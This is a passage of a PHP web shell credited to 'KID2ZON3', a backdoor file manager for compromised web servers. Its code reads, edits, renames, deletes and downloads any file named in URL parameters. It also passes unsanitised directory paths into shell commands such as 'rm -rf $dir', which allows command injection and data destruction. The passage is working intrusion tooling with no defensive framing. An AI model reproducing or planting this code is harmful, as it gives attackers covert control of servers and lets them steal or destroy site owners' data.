2663. <input type='submit' name='dir_rename' value='rename'>
2664. </form>";
2665. } elseif($_GET['act'] == 'delete_dir') {
2666. if(is_dir($dir)) {
2667. if(is_writable($dir)) {
2668. @rmdir($dir);
2669. @exe("rm -rf $dir");
2670. @exe("rmdir /s /q $dir");
2671. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2672. } else {
2673. $act = "<font color=red>could not remove ".basename($dir)."</font>";
2674. }
2675. }
2676. echo $act;
2677. } elseif($_GET['act'] == 'view') {
2678. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2679. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
2680. } elseif($_GET['act'] == 'edit') {
2681. if($_POST['save']) {
2682. $save = file_put_contents($_GET['file'], $_POST['src']);
2683. if($save) {
2684. $act = "<font color=lime>Saved!</font>";
2685. } else {
2686. $act = "<font color=red>permission denied</font>";
2687. }
2688. echo "".$act."<br>";
2689. }
2690. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2691. echo "<form method='post'>
2692. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
2693. <input type='submit' value='Save' name='save' style='width: 500px;'>
2694. </form>";
2695. } elseif($_GET['act'] == 'rename') {
2696. if($_POST['do_rename']) {
2697. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
2698. if($rename) {
2699. $act = "<script>window.location='?dir=".$dir."';</script>";
2700. } else {
2701. $act = "<font color=red>permission denied</font>";
2702. }
2703. echo "".$act."<br>";
2704. }
2705. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2706. echo "<form method='post'>
2707. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
2708. <input type='submit' name='do_rename' value='rename'>
2709. </form>";
2710. } elseif($_GET['act'] == 'delete') {
2711. $delete = unlink($_GET['file']);
2712. if($delete) {
2713. $act = "<script>window.location='?dir=".$dir."';</script>";
2714. } else {
2715. $act = "<font color=red>permission denied</font>";
2716. }
2717. echo $act;
2718. } else {
2719. if(is_dir($dir) === true) {
2720. if(!is_readable($dir)) {
2721. echo "<font color=red>can't open directory. ( not readable )</font>";
2722. } else {
2723. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
2724. <tr>
2725. <th class="th_home"><center>Name</center></th>
2726. <th class="th_home"><center>Type</center></th>
2727. <th class="th_home"><center>Size</center></th>
2728. <th class="th_home"><center>Last Modified</center></th>
2729. <th class="th_home"><center>Owner/Group</center></th>
2730. <th class="th_home"><center>Permission</center></th>
2731. <th class="th_home"><center>Action</center></th>
2732. </tr>';
2733. $scandir = scandir($dir);
2734. foreach($scandir as $dirx) {
2735. $dtype = filetype("$dir/$dirx");
2736. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
2737. if(function_exists('posix_getpwuid')) {
2738. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
2739. $downer = $downer['name'];
2740. } else {
2741. //$downer = $uid;
2742. $downer = fileowner("$dir/$dirx");
2743. }
2744. if(function_exists('posix_getgrgid')) {
2745. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
2746. $dgrp = $dgrp['name'];
2747. } else {
2748. $dgrp = filegroup("$dir/$dirx");
2749. }
2750. if(!is_dir("$dir/$dirx")) continue;
2751. if($dirx === '..') {
2752. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
2753. } elseif($dirx === '.') {
2754. $href = "<a href='?dir=$dir'>$dirx</a>";
2755. } else {
2756. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
2757. }
2758. if($dirx === '.' || $dirx === '..') {
2759. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
2760. } else {
2761. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
2762. }
2763. echo "<tr>";
2764. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
2765. echo "<td class='td_home'><center>$dtype</center></td>";
2766. echo "<td class='td_home'><center>-</center></th></td>";
2767. echo "<td class='td_home'><center>$dtime</center></td>";
2768. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
2769. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
2770. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
2771. echo "</tr>";
2772. }
2773. }
2774. } else {
2775. echo "<font color=red>can't open directory.</font>";
2776. }
2777. foreach($scandir as $file) {
2778. $ftype = filetype("$dir/$file");
2779. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
2780. $size = filesize("$dir/$file")/1024;
2781. $size = round($size,3);
2782. if(function_exists('posix_getpwuid')) {
2783. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
2784. $fowner = $fowner['name'];
2785. } else {
2786. //$downer = $uid;
2787. $fowner = fileowner("$dir/$file");
2788. }
2789. if(function_exists('posix_getgrgid')) {
2790. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
2791. $fgrp = $fgrp['name'];
2792. } else {
2793. $fgrp = filegroup("$dir/$file");
2794. }
2795. if($size > 1024) {
2796. $size = round($size/1024,2). 'MB';
2797. } else {
2798. $size = $size. 'KB';
2799. }
2800. if(!is_file("$dir/$file")) continue;
2801. echo "<tr>";
2802. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
2803. echo "<td class='td_home'><center>$ftype</center></td>";
2804. echo "<td class='td_home'><center>$size</center></td>";
2805. echo "<td class='td_home'><center>$ftime</center></td>";
2806. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
2807. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
2808. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
2809. echo "</tr>";
2810. }
2811. echo "</table>";
2812. if(!is_readable($dir)) {
2813. //
2814. } else {
2815.  
2816. }
2817. echo "<center>Copyright &copy; ".date("Y")." - <a href='http://instagram.com/mdoniadnan_' target='_blank'><font color=lime>KID2ZON3</font></a></center>";
2818. }
2819. ?>
2820. </html>